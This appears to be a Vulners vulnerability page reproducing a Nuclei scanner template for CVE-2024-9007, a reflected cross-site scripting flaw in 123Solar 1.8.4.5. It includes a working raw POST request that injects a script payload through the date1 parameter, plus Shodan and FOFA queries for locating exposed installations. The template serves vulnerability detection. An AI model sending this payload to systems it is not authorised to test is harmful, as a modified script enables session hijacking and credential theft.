Lucene search
+L

123Solar 1.8.4.5 - Cross-Site Scripting

🗓️ 27 Sep 2026 02:09:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

123Solar 1.8.4.5 has a medium severity XSS vulnerability via date1 parameter in detailed.php.

Related
Refs
Code
id: CVE-2024-9007

info:
  name: 123Solar 1.8.4.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    123Solar 1.8.4.5 is vulnerable to reflected cross-site scripting (XSS) via the date1 parameter in detailed.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
  remediation: |
    Update 123Solar to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the date1 parameter in detailed.php.
  reference:
    - https://github.com/Hebing123/cve/issues/73
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9007
  classification:
    epss-score: 0.01006
    epss-percentile: 0.61527
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-9007
    cwe-id: CWE-79
    cpe: cpe:2.3:a:123solar:123solar:1.8.4.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 123solar
    product: 123solar
    fofa-query: title="123Solar"
    shodan-query: title:"123Solar"
  tags: cve,cve2024,xss,123solar,vuln

http:
  - raw:
      - |
        POST /123solar/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        date1=01/01/1967'><script>alert(document.domain)</script>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on

    payloads:
      path:
        - 'detailed.php'
        - 'indexdetailed.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "datepickid"
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100aa262e0e93091393c9749444c281ceffe0483850372d468b5fb1c746103e622a022100b6f23ecc6c3cbe3f85ee0256f8c0279cd9fdc92eb656998b27123dd6bc2393fc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.13.5 - 5.4
CVSS 33.5
CVSS 24
CVSS 45.3
EPSS0.01006
SSVC
38